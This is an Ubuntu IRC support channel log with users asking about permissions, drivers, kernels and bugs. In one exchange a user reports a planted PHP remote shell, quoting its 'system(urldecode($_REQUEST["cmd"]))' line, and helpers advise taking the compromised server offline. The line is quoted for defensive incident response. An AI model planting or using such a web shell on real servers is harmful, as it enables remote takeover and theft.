cfhowlett!kali | cvdd4311:58
ubottucvdd43: The Ubuntu channels can only provide support for Ubuntu and its official flavors, since other distributions and derivatives have repository and software changes. So please use their dedicated support venues, for example: Linux Mint (#linuxmint-help on irc.spotchat.org), Kali Linux (#kali-linux), and LXLE (#lxle)11:58
cvdd43who is online12:08
cvdd43admin meeeee!!!12:09
tomreyncvdd43: do you have an ubuntu support question?12:09
cvdd43some how ;)12:09
tomreyncvdd43: for "some how":12:10
tomreyn!ot12:10
ubottu#ubuntu is the Ubuntu support channel, for all Ubuntu-related support questions. Please register with NickServ (see /msg ubottu !register) and use #ubuntu-offtopic for other topics (though our !guidelines apply there too). Thanks!12:10
cvdd43 /msg ubottu !register12:10
cvdd43wtf12:11
cvdd43iam sorry12:11
cvdd43how old are you guys12:14
cvdd43???12:14
cfhowlettcvdd43, dude.  stop.  this is not a chitchat channel.12:15
cvdd43hhh12:15
cvdd43;)12:15
cvdd43ohh12:15
cvdd43iam sorry12:15
cfhowlettperhaps #ubuntu-offtopic would be better for you.  In any case, read and follow the !guidelines12:15
Ascavasaiontomreyn!!!12:17
Ascavasaiontomreyn: I eventually got 64 bit Ubuntu onto that machine... went back into the logs and did each step you and TJ- told me.  It worked PERFECTLY and all the data seems to be intact as well.12:18
ericrajuinis there a way to search youtube so that yt doesn't knw that Ive search such words12:18
ericrajuinand to dl such video ofc12:19
cvdd43no you cant12:19
cfhowlettsounds like a youtube support query, not an ubuntu query.12:19
aarrggghhmonsterDoes ubuntu 18.04 come with gnome or unity?12:19
cfhowlettericrajuin, download is easy.  youtube-dl youtubeURLgoeshere12:20
ericrajuinI guess it's not ubuntu related12:20
ericrajuinyes i am famaliar with yt-dl12:20
cfhowlettaarrggghhmonster, by default, it will come with gnome.  unity is no longer being officially supported12:20
aarrggghhmonstercfhowlett: That's fine12:20
aarrggghhmonsterI'm happy to see it's coming out quite soon. I want to re-install ubuntu but I can wait a month I suppose12:20
cfhowlettif you have sufficient ram, you could always do a virtualbox best of the 18.04 beta12:21
aarrggghhmonsterToo much effort for no gain?12:21
cfhowlettwell, you seemed a bit ... impatient?12:21
SlidingHornYou won't even have to wait that long...beta's out in like a week12:22
TyrfingMjolnirHow can I make an account that runs a script and logs out?12:23
TyrfingMjolnirIf I would like to do useradd -m reboot12:23
TyrfingMjolnirand have a script in user reboot that does: init 512:23
TyrfingMjolnirI want the script to run auto magically12:23
promilleHi guys. I'm installing 17.10 in VMWare Workstation pro. Does 4GB memory, 4 processors (1 core per processor) and 10GB storage sound OK. The computer is a Lenovo X1 Carbon (5th gen) with 8GB Ram, i5-7200U @ 2.50GHz (4 CPU)12:26
cvdd43YES ITS GOOD12:26
ppfTyrfingMjolnir: automatically when12:27
cfhowlettpromille, yes, that should do nicely.12:27
promillecfhowlett: thanks. is it overkill?12:27
cfhowlettpromille, open 5 -6 ffirefox tabs, start a youtube video and see what happens12:28
ppfstart eclipse12:28
promilleWell its a little late after I've made the VDI :)12:28
promilleBut I tried with 1GB ram and 1 CPU and firefox was very slow12:29
TyrfingMjolnirppf: if I do ssh reboot@10.0.0.1012:29
ppfah12:29
cfhowlett1gb ram?  yeah, that would happen12:30
TyrfingMjolnirIt should not give me a terminal; the script should run12:30
ppfwhy not do ssh 10.0.0.10 reboot12:30
promillecfhowlett: that was the default setting in workstation, I was a little surprised ^^12:30
ppfTyrfingMjolnir: literally has the same amount of characters12:30
TyrfingMjolnirBecause the actual command is not reboot12:30
SlidingHornTyrfingMjolnir, is it a repeating thing?  If so there's always cron12:30
TyrfingMjolnirIt's a set of services12:30
EriC^TyrfingMjolnir: you can run a script12:31
TyrfingMjolnirOnce every 1 - 15 days12:31
ppfthen put the reboot script into your path and name it reboot12:31
TyrfingMjolnirWhen a service hangs12:31
concretelogichello i am trying to change the permissions on a folder on the terminal with sudo chown -R username:group directory, but the directory i'm trying to access has a space in the middle as in "this drive" and my terminal says there is no directory, what can i do?12:31
TyrfingMjolnirthis\ drive12:31
vargfrostanyone where that can help me to setup dnscrypt-proxy on Ubuntu 17.10? After follow this guide at: http://www.ubuntubuzz.com/2017/11/how-to-install-dnscrypt-on-ubuntu-1710.html   my network was lost and i could not connect to internet. I sould add that the guide is rong at some places,   rm or modify /etc/resolv.conf is useless because that file is overwritten or restore at next system boot.12:31
ppfor, you know, "this drive"12:31
EriC^concretelogic: use double quotes on it, chown -R username:group "this drive"12:31
concretelogicseriously?12:32
EriC^concretelogic: yeah :)12:32
concretelogicdamn, i answered my own question, not fair, I think it's working now, thank you so much12:33
concretelogic;)12:33
concretelogic:)12:33
EriC^haha :D no problem12:33
ppf:)12:35
aarrggghhmonstercfhowlett: I wasn't being impatient. I just want a clean install of ubuntu12:36
aarrggghhmonsterI'll wait a month and do it then :-)12:36
cfhowlettsounds like a plan.12:36
cfhowlettalthough ...12:36
samikAnyone here facing hang while installing ebtables on 17.10?12:36
aarrggghhmonsteralthough what?12:37
cfhowlettare you running LTS only?  if so, you might want to wait a bit.  I only install at the .1 release to get the first round of fixes out of the way.  YMMV12:37
samikOr know where to find log_daemon_message output?12:37
aarrggghhmonsterI stick to LTS because I dislike how many wifi driver issues I get otherwise12:37
samikActually the hangup is while starting the ebtables service, journalctl doesn't give any useful info other than "Starting ebtables ruleset management"12:39
samikbut the start script contains some log_**_message calls, might be helpful if I could find where their output goes12:40
samikBut since starting it is a part of installation the installation also hangs12:41
vargfrostor does dnscrypt only work on wired connections and not wifi?12:41
samikJust went to install gns3-gui to run some virtualbox VMs, now I'm actually digging ebtables startup issues12:44
samikCan someone help me with that?12:51
=== EriC^ is now known as EriC^^
=== apsknight1 is now known as apsknight
=== ||| is now known as ||
=== || is now known as |
=== | is now known as |||
|||/part13:07
=== pc is now known as Guest50017
chimangohi, got this application that was zipped, you launch it from terminal by calling a .sh script that adds a PATH13:14
chimangohow can I make a .desktop launcher, just writing the .sh does not work13:14
ericrajuinchimango: I think in the desktop file, the exec part ; exec="path to your script/ script.sh"13:30
rockdarkoGood day, I have a question about packages. I run Ubuntu server and website beyondsecurity[dot]com reports "high risk" vulnerability issues that are beyond my expertise to understand. I plan to educate myself on these but was wondering if there was any way to have Ubuntu pull packages that are more up to date and if it would be considered a high risk to do so.13:42
rockdarkoI mean, there is a difference between up to date and going full Arch experemental is there? Or is there not? I'm running Ubuntu 16.04.4 LTS.13:43
skinuxI a mgetting connection refused for every web server I try to use.13:43
tomreynAscavasaion: glad to hear this, thanks for the feedback13:43
skinuxI mean local host web servers.13:44
rockdarkoOne example of what I am getting: * In Apache httpd before 2.2.34 and 2.4.x before 2.4.27, the value placeholder in [Proxy-]Authorization headers of type 'Digest' was not initialized or reset before or between successive key=value assignments by mod_auth_digest. Providing an initial key with no '=' assignment could reflect the stale value of uninitialized pool memory used by the prior request, leading to leakage of13:44
rockdarkopotentially confidential information, and a segfault in other cases resulting in denial of service.13:44
rockdarkoSorry for the novel guys. I actually typed all this except for the security alert obviously.13:45
albrechtrockdarko: There's going to be a new LTS coming in a week or so, so that's good new for you13:45
tomreyn!latest | rockdarko13:45
ubotturockdarko: Packages in Ubuntu may not be the latest. Ubuntu aims for stability, so "latest" may not be a good idea. Post-release updates are only considered if they are fixes for security vulnerabilities, high impact bug fixes, or unintrusive bug fixes with substantial benefit. See also !backports, !sru, and !ppa.13:45
rockdarkoalbrecht: Lovely. Thanks.13:45
tomreynrockdarko: please read ubottus message13:45
rockdarkotomreyn: So basically, when it comes to packages, there is Ubuntu-safe and Arch-risky and no really in-between?13:46
tomreynthe software you get in ubuntu receives security patches, backported from current version sof the software13:46
rockdarkotomreyn: I did, thanks so much.13:46
rockdarkotomreyn: oh, interesting.13:46
skinuxI've tried nginx, php artisan (laravel), and now xsp (mono), like 4-5 ports and they all get connection refused13:46
tomreynso these messages you encountere don beyondsecurity.com (probably generated by nessus) may not, and probably did not, take into account that these patches were backported13:47
eebI have an unusual wifi issue, and wondering if anyone has seen this. My wifi will connect fine on first boot. It connects automatically at the log in screen. However, once logged in, if I want to change networks, or disconnect and reconnect to the same network, it says the password is wrong13:47
eebRunning 17.10, wayland/gnome (default install)13:48
tomreynrockdarko: ^ to get a reliable idea of whether your installation is affected by these vulnerabilities, you will need to get the "CVE" identifiers provided and check those against https://people.canonical.com/~ubuntu-security/cve/13:48
rockdarkotomreyn: wow I knew I would get some help in here but you are one fregging gem! Thanks for much!13:49
tomreynrockdarko: :) welcome13:49
tomreynyou may also want to read https://wiki.ubuntu.com/SecurityTeam on this and similar topics13:49
tomreynalso https://wiki.ubuntu.com/SecurityTeam/FAQ13:50
Ynduraineeb: try editing the connection manually from Network Settings. choose the network you're trying to connect to, and in the Security tab enter the password manually13:50
skinuxFound it! I uninstalled iptables, which uninstalled ufw and ubuntu-standard, that took care ofi t13:50
Yndurainthen save it, and see if a reboot makes it behave correctly13:50
eebI can do that, and when it reboots it connects to whichever network I have manually chosen, but the same issue persists once logged in13:51
tomreynskinux: no need to uninstall these, you just needed to remove / replace the incorrect policy.13:51
rockdarkotomreyn: thanks again. you are so spoiling me here.13:52
tomreynglad i could help13:53
joopmhello all13:55
joopmi would like to ask a little help13:55
joopmwhat is the correct permission for fileuploading directory?I want to prevent executing scripts13:55
joopmbut if i try 666 thats not allow even file upload because move_upload_file php function does not work13:56
joopmfailed to open stream: Permission denied13:56
TJ-joopm: directories generally have +x (traverse) permission, files only rw13:57
joopmokey thank you13:57
joopmwhat would be good in this case?13:58
TJ-joopm: if directories don't have +x then presumably the 'move_upload_file() cannot traverse directories to the destination13:59
joopmoh i see14:00
eebYndurain: but thanks for the suggestion. weird behaviour indeed14:01
Yndurainyou're--14:02
Yndurainheh14:02
joopmokey i set back to 777,but i am affraid that uploaded scripts will be executable14:02
TJ-joopm: as I said, only directories need the +x, not files, +rx is sufficient for read/traverse. Do NOT set +x on files14:06
=== apsknight1 is now known as apsknight
joopmchmod xxx directoryName will set the directory permission,but whats the way to set permission of the directory files than?14:07
TJ-joopm:  "chmod -R 664 path/to/dir; chmod -R ugo+X path/to/dir" (+X only sets traverse (x) bit on the directories)14:09
TJ-joopm: see "man chmod" for details of how the flags work14:09
skinuxWhy does firewall block localhost loopback connections by default?14:10
TJ-skinux: there are no 'default' firewall rules; it depends on what package is used and it's defaults14:11
skinuxWell, iptables did at laest14:11
skinuxIs shoreline a better firewall?14:12
TJ-skinux: no, iptables is a tool that is called when the user, admin, or some package, has defined some rues14:13
TJ-skinux: the kernel *is* the firewall; shoreline, ufw, are just user-friendly management front-ends that have packaged sets of rules14:14
skinuxOh, okay.14:14
skinuxWell, what I'd like is a GUI front-end14:14
shmoonCan someone help me installing `perf` tool ? whenever i try to use it it throws errors like "dpkg: warning: version '4.14.12-x86_64' has bad syntax: invalid character in revision number"14:16
holdenHello guys, I have a problem with apt-get: https://paste.ubuntu.com/p/5JTrnW9j3p/ Could anybody help? Thanks!14:20
garrettkajmowiczIs the Ubuntu package website 'list of files' feature known/expected to be broken? Trying to view files returns an error: https://packages.ubuntu.com/xenial/linux-image-4.13.0-37-generic14:22
SlidingHornholden, Yakkety is EOL and no longer supported14:23
SlidingHornholden, see !eol for more info14:23
holden!eol14:23
ubottuEnd-Of-Life is the time when security updates and support for an Ubuntu release stop, see https://wiki.ubuntu.com/Releases for more information. Looking to upgrade from an EOL release? See https://help.ubuntu.com/community/EOLUpgrades14:23
ericrajuinsry is this channel for official ubuntu support only ? I thought this is the channel for general ubuntu chat .14:25
lotuspsychjegarrettkajmowicz: that url works here14:25
SlidingHornericrajuin, try #ubuntu-offtopic14:25
skinuxOkay. Well, apparently my real problem is my web browsers keep closing connection with the servers.14:26
skinuxI'm using Opera and Firefox.14:26
garrettkajmowiczlotuspsychje: Did you click on the "list of files" at the bottom? I get "No such package in this suite on this architecture."14:27
holdenSlidingHorn, yes, I understand it is EOL, but I can't upgrade right now. Any solution to fix my problem for the time being?14:27
ericrajuinso this is an official support channel ?14:28
lotuspsychje!support | ericrajuin yes14:28
ubottuericrajuin yes: The official ubuntu support channel is #ubuntu. Also see http://ubuntu.com/support and http://ubuntuforums.org and http://askubuntu.com14:28
Mr_Viverhello14:28
lotuspsychjegarrettkajmowicz: wich ubuntu version are you on, and what are you trying to do exactly?14:29
ericrajuinokay thanks14:29
garrettkajmowiczlotuspsychje: I'm on 16.04 LTS. For some reason I'm still on a 3.13 kernel. However, when I tried upgrading to a 4.x kernel I no longer had r816[89] drivers. So I was trying to figure out which kernels had the correct modules.14:31
skinuxHow do I determine exactly which version of Ubuntu I'm using?14:31
lotuspsychjeskinux: lsb_release -a && uname -a14:32
investigador03alguien por ahi?14:33
lotuspsychje!es | investigador0314:33
ubottuinvestigador03: En la mayoría de los canales de Ubuntu, se habla sólo en inglés. Si busca ayuda en español entre al canal #ubuntu-es; escriba " /join #ubuntu-es " (sin comillas) y presione intro.14:33
lotuspsychjegarrettkajmowicz: yeah some chipset are a pain lately14:34
garrettkajmowiczlotuspsychje: Normally I'd ignore it, but the kernel 3.13 kernel has been having the NIC chipset get into funky states where I need to reboot the machine every few days. I was hoping a new kernel would improve that.14:35
lotuspsychje!info linux-image-generic xenial | garrettkajmowicz14:35
ubottugarrettkajmowicz: linux-image-generic (source: linux-meta): Generic Linux kernel image. In component main, is optional. Version 4.4.0.116.122 (xenial), package size 2 kB, installed size 14 kB14:35
TJ-garrettkajmowicz: the package-list is fine, it's just that the package is no longer in xenial-security, it's in xenial-updates. See https://packages.ubuntu.com/xenial-updates/amd64/linux-image-4.13.0-37-generic/filelist14:35
AuroraAvenueQu, Which App would be the best way to check my texts & SMS on bionic beaver 18.04 ?14:37
lotuspsychjeAuroraAvenue: #ubuntu+1 for 18.04 support please14:37
garrettkajmowiczTJ-: Awesome! At least that shows that the driver isn't in that version either. But the extra modules seems to include it. Yay! Thanks, all!14:38
AuroraAvenuelotuspsychje,  thank-you. I shall try during the working week.14:38
TJ-garrettkajmowicz: it's certainly a bug in the web-site; I'll try to get it addressed14:39
garrettkajmowiczTJ-: Cool! And no worries - I have this "special" ability to find bugs. A few months ago I found 3 bugs in the treadmill software at the fitness facility I use.14:40
kus_ubuntui686hello, what is the way to use an external usb hard disk connected over usb in artful in current year?14:41
lotuspsychjekus_ubuntui686: explain what you mean exactly?14:44
kus_ubuntui686I am trying to copy some files from the computer to the external hard disk but I rebooted the computer and I think gnome usually mounts the usb hard disk when I am there in person https://paste.fedoraproject.org/paste/CN51mtLeWAfFWeSOKPprWg/raw14:45
kus_ubuntui686*usually mounts it automatically to something like /media/kus/hp or something14:46
dasmi_what does ../.. mean?14:46
SlidingHorndasmi_, up 2 directories from the present14:47
dasmi_SlidingHorn, can you explain me how do you understand it? I know that ./ means the current directory; what does the . before ./ and two . after ./ mean?14:48
SlidingHorndasmi_, two dots is "up" - if I'm in /user/bin and I cd .. I go "up" to /usr - if I go cd ../.. I'd be in /14:49
SlidingHorndasmi_, ./ is the same (i think) as .14:49
dasmi_SlidingHorn, now it makes sense to me, thanks a lot14:50
=== kostkon_ is now known as kostkon
=== apsknight1 is now known as apsknight
=== Valette is now known as Guest90420
c31r2ghello15:14
lotuspsychjec31r2g: welcome how can we help you?15:15
c31r2g\m hello15:15
c31r2gi am new to linux15:15
lotuspsychjec31r2g: you joined the ubuntu support channel here15:15
c31r2gjust found freenode and used google to come to this channel.15:15
c31r2gumm, thanks for the welcome. will wander around a bit to see more.15:16
lotuspsychjec31r2g: if you have ubuntu installed, this si the right place15:16
bobo-ubuntuhi, has anybody got experience with creating efi bootable ubuntu usb under live linux?15:16
c31r2gthanks for your time, well this is linux mint15:17
lotuspsychje!mint | c31r2g15:17
ubottuc31r2g: The Ubuntu channels can only provide support for Ubuntu and its official flavors, since other distributions and derivatives have repository and software changes. So please use their dedicated support venues, for example: Linux Mint (#linuxmint-help on irc.spotchat.org), Kali Linux (#kali-linux), and LXLE (#lxle)15:17
c31r2gcool, thank you =15:17
c31r2gl exit15:17
ppfbobo-ubuntu: just ask?15:18
bobo-ubuntuis it possible to create bootable ubuntu in live ubuntu?15:18
akikbobo-ubuntu: just write the ubuntu iso to the usb stick with dd, and run sync before removing the stick15:19
bobo-ubuntuakik, why sync b4 removing key?15:20
jlucto flush the copy-file buffers15:21
akikbobo-ubuntu: dd comes back to the shell before writing all data to the stick15:21
joopmhello15:25
joopmi have a strange feeling because there are unknown files in my upload directoryand i am sure that it was not uploaded through my fileupload script15:25
joopmhow can i get more infos about those files? ls -l onlyshow the creation date and a daemon user15:26
SlidingHornjoopm, what are you trying to learn about them?15:27
joopmwho and how made it15:27
ppf'who' is the daemon user15:28
joopmthere is a file pw.lst and i am affraid someone tried to stole passwords15:28
Ludo_Hi everybody15:32
tomreynjoopm: it's either thator your system is being used to attack other systems using these (common) passwords15:34
tomreynjoopm: what matters is that your system got at least partially compromised, and that's the root of this problem, the one you need to solve.15:35
joopmalso there is a php script uploaded15:35
joopmwhich contain the above code system(urldecode($_REQUEST["cmd"]));15:36
tomreynadditionally you'll need to clean up (or better reinstall, restoring files form a clean backup) this system to regain control over your server.15:36
tomreynuntil both things are done, your system and the data it stores aren't safe and not under your control, and you put other systems and people at risk.15:36
tomreynthat's a classic php remote shell15:37
joopmthe first strange file owner is mysql15:39
joopmso prabably all the other scripts are made by that script15:39
joopmand it could be created through mysql15:39
tomreynit may be a mysql file injection then15:40
joopmbecause the upload file form add special characters to the file name15:40
TJ-joopm: Take tomreyn's advice; that system is now toast, destroy it and re-install; only restore data files/config from a clean back up15:40
s10gopalTJ-, what should i do ?15:41
joopmmy webserver running a php framework15:41
tomreynjoopm: if you want to investigate it further you can do so by mounting the file system from a clean linux system, such as as recovery system (if your host provides one).15:42
tomreynbut you need to shut this down now.15:42
joopmand in mysql database i see an unwanted table15:46
joopmcalled iojdvdd15:46
TJ-I'm trying to debug an X issue; I've added executable commands to a file in /etc/X11/Xsession.d/ but they don't seem to be executed. Other files in that directory appear to execute commands. Command (for testing) is "/usr/bin/touch /var/log/marker". What am I missing?15:46
tomreynjoopm: continuing to investigate this now without bringing the system down is highly irresponsible, since you are probably not the only one working on this system right now. if there is any user data stored there it can get compromised any second now.15:47
SlidingHornjoopm, seriously...you need to take this system offline and worry about forensics later. The priority is stopping the attack15:47
TJ-joopm: we don't need to know what is there, it's of no use to us. We've told you what you need to do.15:47
TJ-FYI: We had this same 'mysql' issue/attack reported a week or more back. possibly from the same user, but I cannot be sure.15:47
s10gopalTJ-, please help me15:48
SlidingHorn!ask s10gopal15:48
ppf!ask | s10gopal15:48
ubottus10gopal: Please don't ask to ask a question, simply ask the question (all on ONE line and in the channel, so that others can read and follow it easily). If anyone knows the answer they will most likely reply. :-) See also !patience15:48
ppf:)15:48
TJ-s10gopal: You've been told what needs doing; get upstream Linux devs to work on fixing it, you've got a bug reported in the Linux bugzilla15:48
SlidingHornppf, thank you...I haven't been here in a while15:48
s10gopal!ping15:52
ubottupong!15:52
cvdd43 hye16:01
cvdd43any one here16:01
cvdd43 please respond16:01
Javabean!hi16:02
cvdd43hye16:04
tomreyn!ask | cvdd4316:04
ubottucvdd43: Please don't ask to ask a question, simply ask the question (all on ONE line and in the channel, so that others can read and follow it easily). If anyone knows the answer they will most likely reply. :-) See also !patience16:04
DJonescvdd43: If you ask your ubuntu support question, you're more likely to get a response16:04
cvdd43why the hill are you talking with me like this16:04
cvdd43iam just saying hye where is the problem16:05
s10gopalhttps://bugs.launchpad.net/ubuntu/+source/linux/+bug/1745646 , the problem exists in latest kernel , but it dont happen in 4.9 and below16:05
ubottuLaunchpad bug 1745646 in linux (Ubuntu) "Battery drains when laptop is off (shutdown)" [Medium,New]16:05
=== r0Oter is now known as r00ter
ayy1995!ping16:14
ubottupong!16:14
zeushi16:15
=== zeus is now known as Guest34818
Guest34818does 1>&2 display the output to stderr16:16
SlidingHornGuest34818, Get rid of the 116:17
Guest34818for example if [ "$3" -n] && >&2 echo "error"16:18
TJ-Guest34818: that is wrong in many ways ... ' [ -n "$3" ] && echo "error" >&2 '  or ' if [ -n "$3" ]; then echo "error" >&2; fi '16:24
cvdd43nooo16:24
s10gopalafter giving all details asked , status is needed to changed in bugzilla ?16:32
SlidingHorns10gopal, if it's an upstream bug, there's really nothing anyone here can do about it16:34
s10gopalSlidingHorn, please tell me what status i should i choose ?16:36
SlidingHornThe status should probably only be changed by the developers investigating it16:37
s10gopalok thx16:38
alphawarriorHello everyone. I have a weird bug on a hp 701eg netbook. I have updated lubuntu from 17.4 to 17.10 yesterday and since then only the taskbar works. I can see the taskabr then the background is the lat thing that the tty had while booting. basically nothing else really works. If I open the terminal with ctrl+alt+t it is shown on the taskbar but doesn't really open. What can I do?16:43
Bashing-omalphawarrior: nvidia graphic's ? in 17.10 which desktop environment ?16:47
alphawarriorwell it has the default intel graphics and it's the original lubuntu desktop16:47
Bashing-omalphawarrior: what returns ' echo $XDG_SESSION_TYPE ' ?16:49
=== rafael is now known as Guest23658
Bashing-omalphawarrior: ( key combo ctl+alt+F2 at the login screen ) .16:50
alphawarrioryeah I know please wait I have to start it16:50
alphawarriorto me it seems like a driver issue: everytime i click on the desktop (which doesn't work) a rainbovy line appears and grows bigger on the top16:52
alphawarriorthere is no XDG_SESSION_TYPE set only XDG_VTNR, XDG_SESSION_ID, XDG_DATA_DIR, XDG_SEAT and XDG_RUNTIME_DIR16:53
Bashing-omalphawarrior: maybe . pastebin ' sudo lshw -C display ' . See if the driver is loaded .16:53
bobo-ubuntu!patience16:54
ubottuDon't feel ignored and repeat your question quickly; if nobody knows your answer, nobody will answer you. While you wait, try searching https://help.ubuntu.com or https://ubuntuforums.org or https://askubuntu.com/16:54
alphawarriorhttps://drive.google.com/file/d/1QUxHCNS7JY4DK7DctUcbpDpc3Pm1wzDw/view?usp=sharing sorry but I can't upload a paste as I can't start a browser. btw I had to tick the "install additional drivers" in the installer when I was installing otherwise the display resolution wouldn't work16:58
=== RaptorJesus is now known as McGriddlest
tgm4883!pastebinit | alphawarrior17:07
ubottualphawarrior: pastebinit is the command-line equivalent of !pastebin - Command output, or other text can be redirected to pastebinit, which then reports an URL containing the output - To use pastebinit, install the « pastebinit » package from a package manager - Simple usage: command | pastebinit17:07
ioriaalphawarrior, that intel chip (945) carries a bug, iirc17:07
alphawarriorWell the graphics driver crashes on lid close...17:08
ioriahttps://bugs.launchpad.net/ubuntu/+source/linux/+bug/172463917:08
ubottuLaunchpad bug 1724639 in openSUSE "Bug in Kernel 4.13 : Intel Mobile Graphics 945 shows 80 % black screen" [Critical,Confirmed]17:08
alphawarrioroh so it's a kernel bug17:09
Bashing-omalphawarrior: O pass this off to ioria -- I have no experience with dual Intel graphic's sets . No driver is loaded for that 2nd card .17:09
alphawarriorcan I somehow return to the 17.04 kernel which at least worked?17:09
ioriaalphawarrior, that's it: or an old kernel (bad) or nomodeset17:10
alphawarriornomodeset? kernel cmdline argument?17:10
ioriaalphawarrior, yup or GRUB_GFXPAYLOAD_LINUX=text17:11
alphawarriorlet me test that17:11
alphawarriorto which grub config file should I add that to?17:13
ioriaalphawarrior, /etc/default/grub and run sudo update-grub17:14
alphawarriorthanks17:14
=== McGriddlest is now known as RaptorJesus
=== HappyHotDog is now known as HungoverHotDog
TJ-alphawarrior: have you tried creating a new user account and testing whether it's GUI works? If it does it means there's some setting stored in the regular user account tripping the DE up17:17
alphawarriorioria: Thanks the GRUB_GFXPAYLOAD=text setting did fix it!!17:17
ioriaalphawarrior, lucky guy17:18
alphawarrioroh why? are these drivers broken?17:18
ioriaalphawarrior, only that chip17:18
ioria*for17:19
alphawarrioroh I see17:19
alphawarriorwell the intel driver also crashes randomly on my i5-2520m cpu and on an other laptop too when i close the lid.17:19
alphawarriorI mean when it goes to sleep17:20
ioriaalphawarrior, fully updated on that machine ?17:21
alphawarriorwell those run the LTS release sadly not the pure ubuntu...17:21
ioriaalphawarrior, 'pure ubuntu ' meaning you install something ouside repos or a derivative ?17:24
alphawarriorelementary...17:25
ioriaah, i see17:25
alphawarriorI have lots of data that I can't move away so I can't change back to normal ubuntu + elementary desktop17:25
ioriaalphawarrior, yes it's not even in the off repos so you 'll still need a ppa for patheon17:26
alphawarrioryeah and also I1ve heard it needs xenial17:32
iorianope, afaik17:34
ioriastable for trusty and xenial, daily for 17.1017:35
=== francisco is now known as Guest4858
iceeHi, I'm on a mainline kernel from the ubuntu kernel-ppa for hardware support reasons18:27
iceethere's no associated linux-tools package?  Am I out of luck if i want perf, etc?18:28
TJ-icee: which PPA exactly?18:43
cvdd43HYE18:46
=== FrankF1 is now known as FrankF
skinuxI need help with this error. The nginx channel said it's not about the server [info] 23903#23903: *516 shutdown() failed (107: Transport endpoint is not connected) while sending to client18:57
tomreynskinux: unless you'll provide more context you won't make much progress here either, i'm afraid.18:59
skinuxTrying to access my website on localhost, i get WSOD, and nginx error log provides this: https://gist.github.com/skinuxgeek/6aeb52d24fb63efd4bd17f8502bed8ea19:01
tomreynskinux: are you saying your ubuntu system freezes with a white screen when you access your locally installed webserver using the http protocol? using a web browser?19:05
tomreynwhich ubuntu release is this?19:05
TJ-tomreyn: this is a long running self-inflicted web-site that fails to send content to browser resulting in an empty page19:06
ikonialooks like fpm is involved too19:07
tomreynso WSoD refer to the web page coming out empty?19:07
ikoniacertanily a redirect to another daemon19:07
tomreyn*referS19:07
TJ-sounds to me like a websocket connection was closed premuturely on the browser/Javascript side19:08
ikonianot really an ubuntu problem though19:09
tomreynunless the ubuntu client freezes while it happens, no.19:09
ikonialooks like the webserver either has duff content, or the redirect to whatever is running on port 9000 isn't completing the request to send an "ok" back to localhost on 8019:09
ikoniatomreyn: that's not freezing19:09
ikonia(look at the logs)19:09
tomreynikonia: these are web server logs, they don't say what the client does. skinux said "i get WSOD", i assume "i" refers to the requesting client.19:10
ikoniatomreyn: there is no such thing as a white screen of death19:11
ikoniahe's getting a white page as the content isn't rednding19:11
ikoniarendering19:11
tomreynThe term "WSoD", or the way i know it, would refer to an OS fgreezing displaying just a white screen.19:11
ikoniawhich is common for the php wordpress app he's running19:11
tomreynoh ok, just a bad explanation then19:11
ikoniait's a browser white screen not the desktop19:11
ikoniait is a bad explanation19:11
tomreynyou're probably right19:11
ikoniaif the OS was freezing the web server logs would be incomplete19:12
ikoniathey are complete and showing the error19:12
TJ-Notice the"upstream: "fastcgi://127.0.0.1:9000"" infers a proxied connection also19:12
tomreynshould probbaly used sockets if localhost19:12
ikoniathe port 9000 problem not responding with "ok" to port 80 I was referencing earlier19:12
tomreyn*use19:12
ikoniait can't19:12
TJ-This has been a repeated issue from skinux over several weeks with some customised config involving nginx and lack of experience19:13
tomreynwhy not?19:13
ikoniabased on those logs it's wordpress using fpm19:13
ikoniaTJ-: based on the scroll back in my logs, it looks like skinux is following some duff tutorial19:13
tomreynright, you can run wordpress or any php scripts fine using nginx + fpm where nginx talks to fpm via sockets.19:14
ikoniatomreyn: the wp-cron doesn't work with sockets I believe19:14
ikonianot all the functions respond to sockets19:14
ikonia(but I'm working from memory to be honest)19:14
tomreynokay, i'm not into the details19:15
tomreynanyways, since skinux just put the question here and then ran itÄs hardly worth spending more time on it. ;)19:15
tomreyn*it's19:15
TJ-got to have something to keep our minds busy :p19:15
xEth0sxsup peeps19:16
ikoniaskinux: have you followed a guide to set this up ?19:16
xEth0sxanyone help with a guide on wireless drivers? having issues getting one working. from what i can tell, as of january, support for a realtek c822 isnt available in ubuntu. its a relatively new comp. trying to install a netgear AC622. according to lsusb its there. i installed the driver. im guessing my issue is in blacklisting a default driver but i'm not sure hoe to do it19:19
xEth0sx*how19:19
iceeTJ-: heh not from a ppa, from kernel-ppa http://kernel.ubuntu.com/~kernel-ppa/mainline/v4.15.13/19:21
xEth0sxor not :/19:23
TJ-icee: I'm pretty sure there was/is another location with the linux-tools ... but I may be mis-remembering and built them myself19:23
jeremy31xEth0sx is that USB?19:24
xEth0sxyes -usb.19:24
xEth0sxthe onboard card isnt showing an available driver19:24
jeremy31xEth0sx in terminal> lsusb | nc termbin.com 999919:24
tomreynwhat's the device id, xEth0sx19:25
xEth0sxits the realtek c82219:25
xEth0sxone sec ill get it19:25
TJ-xEth0sx: you can identify an in-use driver (if any) with "ls -ld /sys/class/net/*/device/driver"19:25
xEth0sxus 001 Device 002: ID 0846:9052 NetGear, Inc. A6100 AC600 DB Wireless Adapter [Realtek RTL8811AU19:25
xEth0sxrtl8811au is the driver i installed for it19:26
TJ-xEth0sx: if I recall correctly the -AU driver is from a github repo, I did some hacking on it last year19:26
ioriaxEth0sx, jeremy31 asked you lsusb | nc termbin.com 9999   , btw19:26
TJ-xEth0sx: ahh yes, I have it installed as a DKMS package rtl8812au_8821au-4.3.14.github.abperiasamy19:26
xEth0sxk gimme a sec let me get the machine up. i'm on my desktop ill log on to it so i can post from it. brb19:27
ikoniawin 819:28
ikoniaoops19:28
tomreynhttps://github.com/abperiasamy/rtl8812AU_8821AU_linux19:28
TJ-tomreyn:  right, that's the one : remote.origin.url=https://github.com/abperiasamy/rtl8812AU_8821AU_linux.git19:29
tomreyncheck insights -> network on github, there are alternatives19:30
TJ-tomreyn: did we ever hear back from the person with the RAID+RAID1+LVM on-32-bit issue?19:30
tomreynTJ-: yes, he responded earlier today saying it went well thanks to our instructions.19:30
TJ-this abperisasamy has generally been the prime mover for the best support19:31
TJ-tomreyn: oh, great! That was a fun investigation, although drawn-out!19:31
TJ-it was like taking layers of wrappings off a birthday present :)19:31
tomreyn<Ascavasaion> tomreyn: I eventually got 64 bit Ubuntu onto that machine... went back into the logs and did each step you and TJ- told me.  It worked PERFECTLY and all the data seems to be intact as well.19:31
jeremy31xEth0sx see https://gist.github.com/jeremyb31/e08fe3f177eea0cb623d0f9c4f554339 for commands19:31
tomreynhehe indeed TJ-, much fun.19:32
TJ-tomreyn: especially when it's someone else's data!19:32
tomreyn:)19:32
